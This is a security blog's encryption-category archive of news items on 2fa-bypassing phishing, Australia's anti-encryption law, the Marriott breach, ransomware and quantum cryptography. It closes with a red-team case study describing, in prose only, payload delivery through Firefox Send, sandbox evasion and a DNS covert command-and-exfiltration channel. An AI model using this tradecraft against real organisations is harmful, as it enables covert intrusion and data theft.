Category Archives: Encryption

Iranian Phishers Bypass 2fa Protections Offered By Yahoo Mail, Gmail

An anonymous reader quotes a report from Ars Technica: A recent phishing campaign targeting U.S. government officials, activists, and journalists is notable for using a technique that allowed the attackers to bypass two-factor authentication protections offered by services such as Gmail and Yahoo Mail, researchers said Thursday. The event underscores the risks of 2fa that relies on one-tap logins or one-time passwords, particularly if the latter are sent in SMS messages to phones. Attackers working on behalf of the Iranian government collected detailed information on targets and used that knowledge to write spear-phishing emails that were tailored to the targets' level of operational security, researchers with security firm Certfa Lab said in a blog post. The emails contained a hidden image that alerted the attackers in real time when targets viewed the messages. When targets entered passwords into a fake Gmail or Yahoo security page, the attackers would almost simultaneously enter the credentials into a real login page. In the event targets' accounts were protected by 2fa, the attackers redirected targets to a new page that requested a one-time password. "In other words, they check victims' usernames and passwords in realtime on their own servers, and even if 2 factor authentication such as text message, authenticator app or one-tap login are enabled they can trick targets and steal that information too," Certfa Lab researchers wrote. "We've seen [it] tried to bypass 2fa for Google Authenticator, but we are not sure they've managed to do such a thing or not," the Certfa representative wrote. "For sure, we know hackers have bypassed 2fa via SMS."

Read more of this story at Slashdot.

Cybersecurity Tools That Every Business Should Consider in 2019

Businesses ignoring cyber security has become a thing of the past. With the sudden increase in cyber-attacks and data breaches, cybersecurity remains at the front of many business leaders’ minds.

The post Cybersecurity Tools That Every Business Should Consider in 2019 appeared first on The Cyber Security Place.

New Australian Backdoor Law

Last week, Australia passed a law giving the government the ability to demand backdoors in computers and communications systems. Details are still to be defined, but it's really bad.

Note: Many people e-mailed me to ask why I haven't blogged this yet. One, I was busy with other things. And two, there's nothing I can say that I haven't said many times before.

If there are more good links or commentary, please post them in the comments.

EDITED TO ADD (12/13): The Australian government response is kind of embarrassing.

Encrypted Messaging Apps Vulnerable To Side-Channel Attacks Including WhatsApp, Telegram, and Signal!

WhatsApp, Signal, and Telegram have all been around for a while. Though a lot of instant messaging apps were already

Encrypted Messaging Apps Vulnerable To Side-Channel Attacks Including WhatsApp, Telegram, and Signal! on Latest Hacking News.

What Happens When Victims Pay Ransomware Attackers?

For many hackers around the globe, ransomware infections have become a lucrative business. Although these types of malware samples have been around for years now, they continue to spur success – and high monetary profits – for attackers.

In fact, according to a statement from U.S. Deputy Attorney General Rod Rosenstein during the 2017 Cambridge Cyber Summit, ransomware attacks now impact over 100,000 endpoints on a daily basis. The severity of these infections and the frequency at which victims pay up on ransom demands has enabled attackers to rake in nearly $1 billion in successful payments, Government Technology reported.

However, not every attack is the same, and even in cases when victims pay hackers’ demands, access to data is not always returned.

To pay or not to pay?

When a ransomware notification appears on-screen, there are numerous questions and considerations that immediately jump to mind. How will the organization support daily operations? How will users access important files and data? Are there backups in place that the business can fall back on?

One of the top questions, though, is whether or not to pay the ransom.

In 2016, the FBI, which is keeping a close eye on the spread and severity of ransomware infections, noted that victims shouldn’t give in to demands and should not pay attackers’ ransoms, Forbes reported. As demonstrated by Kaspersky Labs’ data, this advice is sound, as approximately one in every five companies that fall victim to an attack and pay the ransom do not receive the promised decryption key.

In other words, businesses are out money and are not returned access to their critical applications, files and data.

“Unfortunately, however, as is the case with most ransomware attacks, the stakes of losing years worth of important data is always quite high and the ransom demanded usually very small, leading most victims to give in to the attacker’s demands before even reaching out to law enforcement,” explained Forbes contributor Harold Stark.

Let’s examine a few real-world ransomware infection cases, and what can happen when victims do decide to pay attackers.

Numerous businesses who fall victim to cyberattacks don’t often get the promised description key.

Indiana hospital pays $55,000 after SamSam infection

According to ZDNet, an Indiana-based hospital, Hancock Health, elected to pay $55,000, or the equivalent value of 4 Bitcoin at the time, after its systems were seized by ransomware sample SamSam. Despite immediate awareness and notification by employee end users, the hospital’s IT team wasn’t able to stem the spread of the pervasive ransomware sample.

All told, the infection impacted nearly all of the hospital’s key IT systems, and users were locked out of email, the electronic health record system and other internal platforms. This includes more than 1,400 files, which were encrypted by attackers and renamed as “I’m sorry.”

The sample used in this case, SamSam, seeks out vulnerable servers, and is able to spread to other machines within the network, enabling a quick and widely-scoped attack. And as ZDNet contributor Charlie Osborne pointed out, hackers will make decisions about the ransom amount based on how far SamSam spreads within the victim’s infrastructure.

“Known for use in targeted rather than opportunistic attacks, SamSam can be used in web shell deployment, batch script usage for running the malware on multiple machines, remote access and tunneling,” Osborne explained.

After the initial infection and ransom demand, hospital administrators were given a week to pay the ransom or risk losing their files and data forever. Although the organization did have backups in place – a key data security best practice – it elected to pay the ransom. IT administrators at the hospital explained that while the backups could have been leveraged to recover data and files decrypted by hackers, this process would have taken days, or even weeks. What’s more, after shifting certain work activity to a manual, pen-and-paper basis for two days, the hospital simply needed a quick resolution.

Unfortunately, the hospital is far from the only organization to be infected with the pervasive SamSam sample – in the spring of 2018, Trend Micro reported on a case involving the city of Atlanta. During that attack, the city’s local services, including citizen-facing platforms used to pay bills or access court data, were made unavailable. In this instance, hackers demanded $6,800 to decrypt a single computer or $51,000 for a full decryption. City officials worked with their internal IT team and Microsoft to restore access.

Kansas hospital hit with second infection after paying ransom

While the Indiana hospital infected by SamSam was able to regain its files and data after paying hackers’ ransom, not every organization is so lucky.

According to HealthcareITNews contributor Bill Siwicki, Kansas Heart Hospital in Wichita was the victim of a ransomware attack in mid-2016. While patient data contained within the hospital’s electronic health records system was not impacted and daily operations were able to continue, officials decided to pay the ransom.

Unlike the Hancock Health case, though, access to files and data was not returned, even after the “small amount” in ransom was sent to attackers. Instead, hackers demanded a second ransom and systems impacted by the initial infection remained locked.

“Kansas Heart Hospital did not pay the second ransom request and said that along with consultants it did not think that would be a wise move, even though attackers still appear to have some of their data locked,” Siwicki wrote.

This hospital’s experience isn’t as unique as it might seem, though. Health care security expert Ryan Witt told Siwicki that hackers will often take part in a “tried and tested dance” wherein they demand a small ransom amount, and then demand a second, higher amount once the first is paid.

“Demands for funds are soaring, and the problem is organizations are paying,” Witt noted. “Ransomware will get worse before it gets better.”

Addressing ransomware: Trend Micro’s File Decryptor

As these cases have shown, paying up in the hopes that a ransomware attack will end is not the best strategy. It’s imperative that organizations have backups of all of their critical files and data, and that these are stored in the cloud or another separate, off-site location. In this way, should an attack take place, IT admins can recover using the company’s backups.

In addition, Trend Micro has established a solution specifically to address the issue of ransomware attacks: the Trend Micro Ransomware File Decryptor. This tool works to decrypt and restore files and data impacted by certain ransomware families. As of May 2017, limited decryption support was added for WannaCry, following the widespread impact of the sample.

To find out more about Trend Micro’s File Decryptor, check out this guide. And visit our blog to learn more about why ransomware attacks continue to be successful for hackers.

The post What Happens When Victims Pay Ransomware Attackers? appeared first on .

Australia: Parliament passes anti-encryption bill

The Parliament of Australia has passed the Assistance and Access Bill 2018, which allows Australian authorities to pressure communication providers and tech companies into giving them access to encrypted electronic communications, all in the name of fighting crime and terrorism. Interception capabilities The companies will be forced to use interception capabilities they already have or to build new ones – although the government claims that the authorities can’t use these powers “to introduce so-called ‘backdoors’ … More

The post Australia: Parliament passes anti-encryption bill appeared first on Help Net Security.

Australia Passes Anti-Encryption Bill—Here’s Everything You Need To Know

Australia's House of Representatives has finally passed the "Telecommunications Assistance and Access Bill 2018," also known as the Anti-Encryption Bill, on Thursday that would now allow law enforcement to force Google, Facebook, WhatsApp, Signal, and other tech giants to help them access encrypted communications. The Australian government argues the new legislation is important for national

Days After Massive Breach, Marriott Customers Await Details

Nearly a week after Marriott disclosed a massive breach of its Starwood reservation system, customers complain that the company has not communicated with them to tell them whether they are affected. Marriott says it is sending “rolling” emails to hundreds of millions of victims. An estimated 500 million Marriott International customers...

Read the whole entry... »

Related Stories

Australia Passes Anti-Encryption Laws [Update]

Earlier today, Australia's House of Representatives passed the Assistance and Access Bill. The Anti-Encryption Bill, as it is known as, would allow the nation's police and anti-corruption forces to ask, before forcing, internet companies, telcos, messaging providers, or anyone deemed necessary, to break into whatever content agencies they want access to. "While the Bill can still be blocked by the Senate -- Australian Twitter has been quite vocal over today's proceedings, especially in regards to the [Australian Labor Party's] involvement," reports Gizmodo. ZDNet highlights the key findings from a report from the Parliamentary Joint Committee on Intelligence and Security (PJCIS): The threshold for industry assistance is recommended to be lifted to offenses with maximum penalties in excess of three years; Technical Assistance Notices (TANs) and Technical Capability Notices (TCNs) will be subjected to statutory time limits, as well as any extension, renewal, or variation to the notices; the systemic weakness clause to apply to all listing acts and things; and the double-lock mechanism of approval from Attorney-General and Minister of Communications will be needed, with the report saying the Communications Minister will provide "a direct avenue for the concerns of the relevant industry to be considered as part of the approval process." The report's recommendations also call for a review after 18 months of the Bill coming into effect by the Independent National Security Legislation Monitor; TANs issued by state and territory police forces to be approved by the Australian Federal Police commissioner; companies issued with notices are able to appeal to the Attorney-General to disclose publicly the fact they are issued a TCN; and the committee will review the passed legislation in the new year and report by April 3, 2019, right around when the next election is expected to be called. In short: "Testimony from experts has been ignored; actual scrutiny of the Bill is kicked down the road for the next Parliament; Labor has made sure it is not skewered by the Coalition and seen to be voting against national security legislation on the floor of Parliament; and any technical expert must have security clearance equal to the Australia's spies, i.e. someone who has been in the spy sector." Further reading: Australia Set To Spy on WhatsApp Messages With Encryption Law. UPDATE: The encryption bill has passed the Senate with a final vote of 44-12, with Labor and the Coalition voting for it. "Australia's security and intelligence agencies now have legal authority to force encryption services to break the encryptions, reports The Guardian. Story is developing...

Read more of this story at Slashdot.

Australia’s Anti-Encryption Bill Passes House of Representatives

Earlier today, Australia's House of Representatives passed the Assistance and Access Bill. The Anti-Encryption Bill, as it is known as, would allow the nation's police and anti-corruption forces to ask, before forcing, internet companies, telcos, messaging providers, or anyone deemed necessary, to break into whatever content agencies they want access to. "While the Bill can still be blocked by the Senate -- Australian Twitter has been quite vocal over today's proceedings, especially in regards to the [Australian Labor Party's] involvement," reports Gizmodo. ZDNet highlights the key findings from a report from the Parliamentary Joint Committee on Intelligence and Security (PJCIS): The threshold for industry assistance is recommended to be lifted to offenses with maximum penalties in excess of three years; Technical Assistance Notices (TANs) and Technical Capability Notices (TCNs) will be subjected to statutory time limits, as well as any extension, renewal, or variation to the notices; the systemic weakness clause to apply to all listing acts and things; and the double-lock mechanism of approval from Attorney-General and Minister of Communications will be needed, with the report saying the Communications Minister will provide "a direct avenue for the concerns of the relevant industry to be considered as part of the approval process." The report's recommendations also call for a review after 18 months of the Bill coming into effect by the Independent National Security Legislation Monitor; TANs issued by state and territory police forces to be approved by the Australian Federal Police commissioner; companies issued with notices are able to appeal to the Attorney-General to disclose publicly the fact they are issued a TCN; and the committee will review the passed legislation in the new year and report by April 3, 2019, right around when the next election is expected to be called. In short: "Testimony from experts has been ignored; actual scrutiny of the Bill is kicked down the road for the next Parliament; Labor has made sure it is not skewered by the Coalition and seen to be voting against national security legislation on the floor of Parliament; and any technical expert must have security clearance equal to the Australia's spies, i.e. someone who has been in the spy sector." Further reading: Australia Set To Spy on WhatsApp Messages With Encryption Law.

Read more of this story at Slashdot.

Quantum Computers Pose a Security Threat That We’re Still Totally Unprepared For

An anonymous reader quotes a report from MIT Technology Review: The world relies on encryption to protect everything from credit card transactions to databases holding health records and other sensitive information. A new report from the U.S. National Academies of Sciences, Engineering, and Medicine says we need to speed up preparations for the time when super-powerful quantum computers can crack conventional cryptographic defenses. The experts who produced the report, which was released today, say widespread adoption of quantum-resistant cryptography "will be a long and difficult process" that "probably cannot be completed in less than 20 years." It's possible that highly capable quantum machines will appear before then, and if hackers get their hands on them, the result could be a security and privacy nightmare. Today's cyberdefenses rely heavily on the fact that it would take even the most powerful classical supercomputers almost unimaginable amounts of time to unravel the cryptographic algorithms that protect our data, computer networks, and other digital systems. But computers that harness quantum bits, or qubits, promise to deliver exponential leaps in processing power that could break today's best encryption. The report cites an example of encryption that protects the process of swapping identical digital keys between two parties, who use them to decrypt secure messages sent to one another. A powerful quantum computer could crack RSA-1024, a popular algorithmic defense for this process, in less than a day. The U.S., Israel and others are working to develop standards for quantum-proof cryptographic algorithms, but they may not be ready or widely adopted by the time quantum computers arrive. "[I]t will take at least a couple of decades to get quantum-safe cryptography broadly in place," the report says in closing. "If that holds, we're going have to hope it somehow takes even longer before a powerful quantum computer ends up in a malicious hacker's hands."

Read more of this story at Slashdot.

Australia Set To Spy on WhatsApp Messages With Encryption Law

Australia is set to give its police and intelligence agencies the power to access encrypted messages on platforms such as WhatsApp, becoming the latest country to face down privacy concerns in the name of public safety. From a report: Amid protests from companies such as Facebook and Google, the government and main opposition struck a deal on Tuesday that should see the legislation passed by parliament this week. Under the proposed powers, technology companies could be forced to help decrypt communications on popular messaging apps, or even build new functionality to help police access data. Prime Minister Scott Morrison has said the legislation is needed to help foil terrorist attacks and organized crime. Critics say it is flawed and could undermine security across the Internet, jeopardizing activities from online voting to market trading and data storage.

Read more of this story at Slashdot.

Marriott Data Breach Impacts Personal Information of up to 500 Million Guests

Marriott disclosed a breach of its Starwood reservation database that potentially affects an estimated 500 million guests.

Details of the Marriott data breach, which goes back to 2014, have been reported to law enforcement and regulatory authorities, according to the company. Marriott said it received an initial alert on Sept. 8 that an unauthorized third party had attempted to access the Starwood database. Further investigation revealed that an unknown entity copied and encrypted guest information and also attempted to steal the database. The public first learned of the data breach when it was disclosed on Nov. 30.

What Personal Information Was Stolen?

Although the company stated that it had not finished decrypting the copied information at the time of disclosure, it confirmed that the personally identifiable information (PII) of approximately 327 million people might have been comprised. The data includes payment card numbers and expiration dates, though it is not yet known if the two keys needed to decrypt the Advanced Encryption Standard (AES-128) protocol used to protect this information were also stolen.

In addition to payment card information, threat actors also accessed the 327 million customers’ names, passport numbers, Starwood Preferred Guest account information, dates of birth, genders and email addresses. For the remaining guests, the information was limited to names and mailing or email addresses.

The Marriott incident is one of the largest in history, and could be one of the first opportunities for European Union regulators to flex their General Data Protection Regulation (GDPR) muscles. The GDPR was enacted in late May, promising severe fines for violations of data privacy and disclosure.

Response to the Marriott Data Breach

Since the Marriott data breach was disclosed, two class-action lawsuits seeking damages for the exposure of personal information have been filed. Multiple news outlets, including The New York Times, have reported that the Federal Bureau of Investigation (FBI) is tracking the situation, and investigations have been launched by attorneys general in several states.

Customers affected by the Marriott data breach can access a dedicated website and call center with any questions. The company is also offering guests a free year of the WebWatcher monitoring software to help identify any misuse of personal information.

Of course, Marriott is far from alone in dealing with large data breaches. According to Ponemon’s “2018 Cost of a Data Breach Study,” the number of mega breaches — those involving more than 1 million records — has nearly doubled from 2013 to 2017.

Sources: Marriott, ZDNet, The New York Times

The post Marriott Data Breach Impacts Personal Information of up to 500 Million Guests appeared first on Security Intelligence.

Cross-Industry Approaches to Managing Potentially Catastrophic Cyber Risks

The other day I was reading a history of the events leading up to the Challenger space shuttle disaster, which got me thinking of the ways different industries manage risk. In that tragic case, the design of the O-ring seals in the right rocket booster presented a known risk that nontechnical executives downplayed and did not fully comprehend when they made the decision to move forward with the launch.

Similarly, the security industry contends with a range of cyber risks that can cause catastrophic damage to a business, such as large-scale disclosure of personal data, failure of power infrastructure caused by rogue threat actors and the interruption of critical emergency service systems.

Having worked with many clients in various industries over the years, I have observed myriad approaches to risk management. But the fact remains that many organizations are still immature in this area because best practices are not typically shared across industries. Organizations are often wed to their method of managing risk and do not look outside for ways to improve.

Assurance and Traceability Are Key

In the 1990s — around the time when I first completed a security evaluation of the Advanced Interactive eXecutive (AIX) operating system — the Information Technology Security Evaluation Criteria (ITSEC) was considered a best practice in the U.K. Today, we have the Common Criteria for Information Technology Security Evaluation (CC) and the companion Common Methodology for Information Technology Security Evaluation (CEM).

The security evaluation process considers the functionality of security controls and the assurance of those controls. Depending on what the solution protects, there is a requirement for increased levels of assurance through additional documentation and testing — with an associated cost.

To provide assurance, security requirements were traced from the initial requirements through the different levels of design to testing in a traceability matrix. Outside the public sector, the architectural thinking process used today uses some traceability, but without rigor or consideration of the differing levels of detail required depending on the risk to the business.

Today, the “NASA Systems Engineering Handbook” highlights the need for bidirectional traceability of requirements in solutions.

The Difference Between Verification and Validation

In pharmaceuticals, there is the concept of verification and validation of a solution. Verification means ensuring that the solution is built according to the requirements and design. Traceability supports this principle — together with reviews of the solution — to ensure that functionality has been implemented and will be tested.

Validation means ensuring the solution meets users’ needs. In security, it’s not just testing that the product will enforce the control, but making sure the users’ needs are met within the environment where it is being used. Having a security control that requires a user to log in every 30 minutes may improve security, but if the user takes 20 minutes to log in through another three logins and can only perform 10 minutes of productive work, it does not meet the needs of the user or the business.

Today, NASA uses the verification and validation approach in its Systems Engineering Handbook, and I am sure other industries can make use of these principles.

Minimize Risk With a Layered Defense Strategy

Financial and banking institutions are increasingly adopting approaches to risk management that outline three lines of defense to ensure ownership, oversight and governance. The second line of defense looks at the overall aggregate risk for the organization. In the case of the space shuttle program, the challenge was how to effectively communicate that the material risks could be catastrophic.

Originating from the oil and gas industry in the 90s, military and aviation have adopted the use of barrier risk models to visualize risk, such as the bowtie model. We know that incidents will happen, so it’s important to pay the same level of attention to the preparation and prevention controls as the detection, response and recovery controls. At the center of the bowtie model is the catastrophic event that may happen, with the controls preventing the event from happening on the left, and the controls that contain the consequences of the event on the right.

Combining the five stages of the NIST Cybersecurity Framework with the bowtie model is a great way to represent the depth and strength of security controls to employees with a less technical background. It also allows engineering staff to better demonstrate that additional controls are not required when the current security controls are appropriate to the risk.

There are many different ways to represent the controls. Below is an example for data-at-rest encryption:

Bow Tie Diagram

How Strong and Mature Are Your Security Controls?

Each of the controls an organization uses can have a different strength of mechanism. If I use the six-character password “123456,” it is very weak compared to one that is enforced by software when a password is changed. A single strong control is better than many controls that have a low strength of mechanism.

The context of how a security mechanism is implemented or deployed may also alter its strength. Using a large encryption key may be weakened by the randomness of the key, and inspecting a TLS session may weaken the effectiveness of encryption. Think about the context of the implementation.

Each control may also have a different level of maturity. If I use a firewall that has been installed without a formal design, without testing and with no documented procedures to manage the life cycle, the maturity is low with an increased likelihood that the controls will be inadequate. Having one very mature process that is enforced rigorously may be better than having many controls that are poorly maintained. Using the Capability Maturity Model Integration (CMMI) can help organizations assess the maturity of a process. Without the right balance of procedural, organizational and technical controls, the maturity may not be adequate.

Tips for Managing Cyber Risks

The next time you have a risk that is considered material to the operation of your business — especially one that could result in a catastrophic incident — consider what you can learn from how other industries manage risk. Below are some best practices for managing cyber risks:

  • Ensure traceability of controls with assurance appropriate to the risk.
  • Consider both verification and validation in the assurance of a solution.
  • Use multiple levels of risk review with three lines of defense.
  • Examine defense in depth with an appropriate strength of mechanism.
  • Assess and drive continuous improvement in the maturity of control mechanisms.

Last, but certainly not least, make sure you communicate these principles to staff and suppliers to get them on board and garner their support in managing risk effectively.

What is your industry’s primary security challenge?

The post Cross-Industry Approaches to Managing Potentially Catastrophic Cyber Risks appeared first on Security Intelligence.

Massive Marriott Breach Underscores Risk of overlooking Data Liability

The Marriott breach underscores how companies fail to price in the risk of poor data security. In the age of GDPR, that could be an expensive failure. 

The post Massive Marriott Breach Underscores Risk of overlooking Data Liability appeared first on The Security Ledger.

Related Stories

Marriott breach impacts 500 million customers: here’s what to do about it

Today Marriott disclosed a large-scale data breach impacting up to 500 million customers who have stayed at a Starwood-branded hotel within the last four years. While details of the breach are still sparse, Marriott stated that there was unauthorized access to a database tied to customer reservations stretching from 2014 to September 10, 2018.

For a majority of impacted customers (approximately 327 million), the breached data includes some combination of name, mailing address, phone number, email address, passport number, Starwood Preferred Guest account information, date of birth, gender, arrival and departure information, reservation date, and communication preferences. For some of those guests, their credit card numbers and expiration dates were exposed, however, they were encrypted using the Advanced Encryption Standard (AES-128).

You can read more on impact to customers in Marriott’s statement here.

A root cause of the breach is currently unknown, but Marriott indicated that the intruders encrypted the information before exfiltrating the data. Brian Krebs reported that Starwood reported its own breach in 2015, shortly after acquisition by Marriott. At the time, Starwood said that their breach timeline extended back one year, to roughly November 2014. Incomplete remediation of breaches is extremely common, and when compounded by asset management challenges introduced by mergers and acquisitions, seeing lateral movement and exfiltration after an initial hack is not unreasonable.

Starwood properties impacted are as follows:

  • Westin
  • Sheraton
  • The Luxury Collection
  • Four Points by Sheraton
  • W Hotels
  • St. Regis
  • Le Méridien
  • Aloft
  • Element
  • Tribute Portfolio
  • Design Hotels

What should you do about it?

If you’re a customer:

  • Change your password for your Starwood Preferred Guest Rewards Program immediately. Random passwords generated by a password manager of your choice should be most helpful.
  • Review your banking and credit card accounts for suspicious activity.
  • Consider a credit freeze if you’re concerned your financial information was compromised.
  • Watch out for breach-related scams; cybercriminals know this is a massive, newsworthy breach so they will pounce at the chance to ensnare users through social engineering. Review emails supposedly from Marriott with an eagle eye.

Download our Data Breach Checklist here.


If you’re a business looking for tips to prevent getting hit by a breach:

  • Invest in an endpoint protection product and data loss prevention program to make sure alerts on similar attacks get to your security staff as quickly as possible.
  • Take a hard look at your asset management program:
    • Do you have 100 percent accounting of all of your external facing assets?
    • Do you have uniform user profiles across your business for all use cases?
  • When it comes to lateral movement after an initial breach, you can’t catch what you can’t see. The first step to a better security posture is to know what you have to work with.

In a world where it seems breaches cannot be contained, consumers and businesses once again have to contend with the aftermath. Our advice to organizations: Don’t become a cautionary tale. Save your customers hassle and save your business’ reputation by taking proactive steps to secure your company today.

The post Marriott breach impacts 500 million customers: here’s what to do about it appeared first on Malwarebytes Labs.

How to Future-Proof Your Enterprise With Quantum-Safe Cryptography

Quantum computers are poised to solve currently intractable problems for traditional technology. At some point in the next 10 or 15 years, quantum computers may be powerful enough to put your data at risk by compromising your cryptography. Data protected by today’s encryption methods may become susceptible to decryption by the unprecedented processing power of the emerging quantum computer.

Act Today to Prepare for the Future

The urgency to act now is based on a data risk timeline. Data stored today may need to remain confidential or valid for up to 30 years. There are four factors that influence the data risk timeline:

  1. The strength of your current cryptographic algorithms. Weaker algorithms may be at risk before stronger algorithms. The challenge is to know your complete cryptographic inventory.
  2. The security time value of data being protected. How long must the data be protected throughout the life cycle of a product?
  3. Crypto-agility. How quickly can an enterprise upgrade existing cryptographic deployments? For some organizations, it may take years.
  4. The pace of quantum technology improvements.

What Is Quantum-Safe Cryptography?

Quantum-safe cryptography refers to algorithms that run on today’s classical computers but are secure against quantum adversaries. The implication is that we can protect data today.

IBM develops and standardizes quantum-safe cryptographic algorithms in an open and collaborate fashion. Cryptographic standards are important to facilitate the widespread and interoperable adoption of security. IBM believes that lattice-based cryptography has the best combination of quantum-resistant properties and is part of three lattice-based consortium submissions to the National Institute of Standards and Technology (NIST)’s call for post-quantum standards.

Why Crypto-Agility Is Crucial

Few enterprises know the full range of cryptographic solutions they have deployed. For some, it may take years to upgrade their cryptography, as with migrations from SHA-1 to SHA-2 or Triple Data Encryption Standard (TDES) to Advanced Encryption Standard (AES). The transition from today’s cryptography to quantum-safe technology offers an opportunity to rethink how applications consume cryptography. Cryptographic agility is a key aspect of cybersecurity, and organizations would be wise to leverage it as part of their quantum-safe journey.

If you’re interested in setting up a Quantum Risk Assessment for your organization, please get in touch.

The post How to Future-Proof Your Enterprise With Quantum-Safe Cryptography appeared first on Security Intelligence.

OceanLotus Watering Hole Campaign Compromises 21 High-Profile Southeast Asian Websites

A watering hole campaign that has been active in Southeast Asia since September has compromised at least 21 websites, including those of government agencies and major media outlets.

Researchers attributed the attack to a group of cybercriminals known as OceanLotus, which has been targeting foreign governments for approximately six years. Users who visited the compromised websites were redirected to a page controlled by the attackers. While those in charge of the domains have since been informed about the watering hole attack, some continue to be injected with malware scripts.

A Wider Watering Hole Than Usual

The traditional watering hole campaign strategy has focused on luring specific individuals by compromising URLs they’re known to use regularly, but the latest OceanLotus attack includes sites such as a popular Vietnamese newspaper, suggesting that a large number of people could be affected.

Over the course of a multiphase attack, OceanLotus installs a piece of malicious Java code on a site that creates a connection with a victim’s system, and then additional scripts to deliver a possible payload. While the full extent of the watering hole campaign isn’t clear, researchers speculated that the compromised websites could be used to conduct phishing schemes and steal confidential data.

Like many other cybercriminal organizations, OceanLotus is focused on improving the sophistication of its attacks. The researchers noted, for example, that the group used an RSA 1024-bit public key to prevent the decryption of information sent from its server and client devices. OceanLotus also purchased dozens of domains and servers, which it used to run the first and second stages of the attacks and make the URLs look legitimate.

How To Strike A Better Threat Management Balance

Compared with more obvious tactics, such as phishing emails with malicious links or ransomware attachments, a watering hole campaign can easily fly under the radar of organizations that haven’t experienced a website compromise before. For that reason, many companies affected by the likes of OceanLotus find themselves responding reactively rather than proactively addressing the associated risks ahead of time.

IBM experts suggest adopting a threat management framework that begins with generating insights about potential attacks, implementing safeguards necessary to prevent them, monitoring continuously to detect anomalies and responding as necessary.

Source: WeLiveSecurity

The post OceanLotus Watering Hole Campaign Compromises 21 High-Profile Southeast Asian Websites appeared first on Security Intelligence.

Phish or Fox? A Penetration Testing Case Study From IBM X-Force Red

As you may know, IBM X-Force Red is IBM Security’s penetration testing team. The team features professional, world-class testers who help organizations find and manage their security vulnerabilities on any and all platforms, including software and hardware devices. Our motto is “hack anything to protect everything.”

This post features a case study from IBM X-Force Red that shows how we ran into trouble on a black-box penetration testing assignment, worked against a well-prepared blue team, and overcame the obstacles to ultimately establish a solid adversarial operation. Let’s take a closer look at what we did to get through security and, more importantly, what your team can do to better secure your organization in an ever-evolving adversarial landscape.

A Tale of an Undeliverable Payload

On one of our red team’s recent engagements with a customer’s blue team, we were tasked with delivering a malicious payload to network users without setting off security controls or alerting the defensive team.

As a first attempt, we sent a phishing email to feel out the level of awareness on the other side. The email message was rigged with our malicious payload, for which we selected the attachment type and a lure that would appear credible. However, the blue team on the other side must have been lying in wait for suspicious activity. Every one of our emails was delivered, but our payloads were not. The payloads did not call home to the control server we had set up, and we started getting visits from the defensive team in the form of an anti-malware sandbox.

Within minutes, additional sandboxes hit on our command and control (C&C) server’s handler, and soon more than 12 security vendor clouds were feasting on the payload. We understood at that point that our payload had been detected, analyzed and widely shared by the blue team, but since this was a black-box operation, we had little way of knowing what went wrong after sending out our rigged emails.

If the Phish Fails, Send in the Fox

Going back to the drawing board, we realized that we must have triggered the blue team’s dynamic malware detection systems and controls. We had to find a new way to deliver the payload in a more concealed manner — preferably encrypted — and to have it detonate only when it reached its final destination to prevent premature discovery.

To do so, we had to overcome some hurdles, including:

  • Sidestepping traffic inspection controls;
  • Opening a siloed channel to send information from outside into the organizational networks;
  • Decreasing repeatable sampling of our externally hosted content;
  • Minimizing the chance of attribution at the initial visit/download/delivery stages; and
  • Bypassing URL inspections.

Some creative thinking summoned a good candidate to help us overcome most controls, mostly because it is a legitimate service that people use in daily interactions: Mozilla’s Firefox Send (FFSend).

Before we continue to describe the use of FFSend, we would like to note here that it is a legitimate tool that can be used safely, and that it was not compromised. We also disclosed information in this blog to Mozilla ahead of its publication and received the company’s support.

The Right Fox for the Job

FFSend is a legitimate file transfer tool from Mozilla. It has several interesting features that make it a great tool for users, and when files are sent through, its developers indicate it will generate “a safe, private and encrypted link that automatically expires to ensure your stuff does not remain online forever.” This makes FFSend a useful way to send private files between people in a secure manner.

To send a file, the sender, accessing FFSend via a browser, uploads the file he or she wants to share with the recipient through a simple web interface. He or she receives a URL for a shared link and can send it to the recipient. The recipient visits the shared link and downloads the file, at which point the FFSend service “forgets” the link and removes shared content from the server.

Red Team Research

Figure 1: Basic flow of events using FFSend

From our red team’s perspective, FFSend was a good fit for sending encrypted files. Let’s see how it answered some of the needs we defined.

FFSend allows for large file sizes up to 1 GB, which is large enough an allowance to both send a payload and exfiltrate data. This answered our need for a siloed, covert channel into the organization. It would encrypt and decrypt the payload for us with an AES-GCM algorithm directly in the internet browser, yet we won’t have to deal with any key generation or distribution. The payload would evade the inspection of intercepting proxies that can unwrap Transport Layer Security (TLS), and would remain private and won’t be shared with any party along the way, including Mozilla.

Red Team Payload Delivery

Figure 2: Schematic view of FFSend’s automated encryption

Since is a trusted domain on most organizational controls, we gain yet another advantage by using FFSend. We won’t have to labor to set up a fake site that would raise suspicion, and we can still get our file’s link across to the recipient. The trusted Firefox domain is also more likely to slip through URL inspection and anti-phishing controls, as well as blacklists that organizations deploy to catch malicious content coming from rogue resources.

Red Team Research

Figure 3: FFSend is considered a trusted source

As for reducing repeated sampling of the payload, we get that as well by setting a strict one-time-only limit on the number of times our FFSend link can be accessed after it’s generated, avoiding the sandbox attempts and threat sharing. Moreover, FFSend automatically expires links after 24 hours, which effectively makes the path to our payload self-destruct if the target has not opened it. Self-destruction is also featured on FFSend’s application program interface (API), so it can also be ordered ad hoc after a link is sent but before its default expiration.

Red Team Research

Figure 4: FFSend’s link expiration and self-destruct schema

Avoiding attribution is also easier when using a legitimate service that implements ephemeral storage of the files it delivers. Using such a service allowed us to avoid any links back to our testers, since there was no account required to send a file, nor was information on the owner of the encrypted data sent, required or kept.

This meant our ownership of the malicious file would be anonymous, though there would still be a tie to our originating IP address and browser fingerprints. With most information concealed, we deemed this level of anonymity good enough for the desired outcome.

Red Team Payload Delivery

Figure 5: No sender identity required, no attribution links back to red team

Setting Up a Communications Channel

With the file sending issue resolved, we still needed a covert communication channel to help us establish an ongoing operation without being ousted by the blue team.

To set up a communications channel, we did not wish to start from scratch. We decided to use FFSend to make it work as the siloed, covert channel we needed. That was one problem solved, but to coordinate the sending and receiving of data over that channel, we would also need a side channel of communications to avoid inspection and detection.

Communication gets inspected by a number of security controls, so it is essential that we blend in with the environment. To do that, we would have to choose a communication protocol that would allow us to look like everyone else on the network. Looking at the typical choices — Hyper Text Transfer Protocol Secure (HTTPS), Internet Control Message Protocol (ICMP) and Domain Name System (DNS) protocols — we selected DNS for its decent packet capacity and overall better chance of blending in with legitimate user traffic.

DNS fit our need to implement a data channel to FFSend. Also, a command channel can offload to DNS. To make everything work together, DNS record content could be encrypted with the same FFSend shared key used to post the data link, keeping things consistent.

In our command protocol, we can accommodate short instructions and differentiate between the types of requests we want to task agents with, to run or receive responses on. For example, we can encode instructions such as fetch me <file> or execute <command>. The agent would then carry out the request and post the results over our FFSend data channel.

